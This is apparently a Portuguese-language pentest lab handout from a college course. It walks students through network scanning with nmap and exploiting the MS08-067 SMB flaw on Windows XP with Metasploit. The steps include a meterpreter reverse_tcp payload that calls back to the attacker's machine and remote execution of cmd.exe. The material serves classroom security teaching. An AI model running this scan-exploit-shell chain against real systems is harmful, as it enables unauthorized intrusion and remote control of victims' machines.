Pratica-3 - metasploit

Embed Size (px)

Citation preview

  • 8/7/2019 Pratica-3 - metasploit

    1/4

    Prtica Usando MetasploitProf. Ramon Mota CTS-SEI-2010.1

    Aula prtica PENTEST

    Ambiente da aula:Duas esto de trabalho com MS Windows XP Home Edition Service Pack 2;Quatro estaes com live DVD BackTrack 4 final;

    Ferramentas utilizadas:Metasploit 3.3;nmap;Utilitrios de linha de comando do MS Windows (cmd, mkdir, etc);

    Exploit Meterpreter;

    Buscando o alvoPara realizar um mapeamento da rede e saber quais estaes esto ativas ns iremos usar oNMAP.

    #nmap -v 192.168.0.0/24

    Aps identificar os possveis alvos (estaes Windows), vamos verificar qual a verso do sistemaoperacional:

    #nmap -O 192.168.0.XX Usar o endereo IP dos possveis alvos!

    Nosso alvo ser um MS Windows XP com SP2

    Iremos explorar a seguinte vulnerabilidadehttp://www.microsoft.com/technet/security/Bulletin/MS08-067.mspxhttp://www.securityfocus.com/bid/31874/info

    Vamos ento usar o NMAP para identificar se o nosso alvo possui a vulnerabilidade descrita noslinks acima:

    #nmap -v --script=smb-check-vulns 192.168.0.XX IP do alvo!

    Faculdade de Tecnologia IBRATEC de Joo Pessoa Pgina 1/4

    FP.AC.014.00

    http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspxhttp://www.securityfocus.com/bid/31874/infohttp://www.microsoft.com/technet/security/Bulletin/MS08-067.mspxhttp://www.securityfocus.com/bid/31874/info
  • 8/7/2019 Pratica-3 - metasploit

    2/4

    Aps detectar a vulnerabilidade do sistema, vamos ento iniciar as atividade com o Metasploit(www.metasploit .com ):

    Vamos iniciar o MSF no modo console:#msfconsole

    Faculdade de Tecnologia IBRATEC de Joo Pessoa Pgina 2/4

    FP.AC.014.00

    http://www.metasploit.com/http://www.metasploit.com/http://www.metasploit.com/http://www.metasploit.com/http://www.metasploit.com/http://www.metasploit.com/
  • 8/7/2019 Pratica-3 - metasploit

    3/4

    Vamos ento selecionar o exploit que queremos utilizar:

    msf > use exploit/windows/smb/ms08_067_netapi Este explora a vulnerabilidade dos links!msf > set RHOST 192.168.0.XX Determina o IP do alvo.

    msf > set PAYLOAD windows/meterpreter/reverse_tcp Cdigo malicioso.msf > set LHOST 192.168.0.YY O seu IP.msf > exploit

    PRONTO!!!!!

    Se tudo deu certo j estamos dentro do sistema alvo.

    Execute o ? para obter ajuda para os comando do METERPRETER:

    meterpreter > ?

    meterpreter > sysinfo

    Vamos agora executar o CMD.EXE na mquina remota:

    meterpreter > execute -f cmd.exe -c Vai executar o cmd.exe da mquinaremota no prompt atual.meterpreter > interact 1 Trs a sesso para o canal 1.

    Faculdade de Tecnologia IBRATEC de Joo Pessoa Pgina 3/4

    FP.AC.014.00

  • 8/7/2019 Pratica-3 - metasploit

    4/4

    Agora pessoal s usar a mente brilhante e ter boas ideia.

    PARABNS!!!!!

    REFERNCIAS

    http://www.microsoft.com/brasil/windowsxp/using/helpandsupport/learnmore/ballew_commandline.mspxhttp://pt.wikipedia.org/wiki/Lista_de_comandos_do_MS-DOShttp://www.microsoft.com/technet/security/Bulletin/MS08-067.mspxhttp://www.securityfocus.com/bid/31874/infohttp://www.metasploit.comhttp://nmap.org/

    Faculdade de Tecnologia IBRATEC de Joo Pessoa Pgina 4/4

    FP.AC.014.00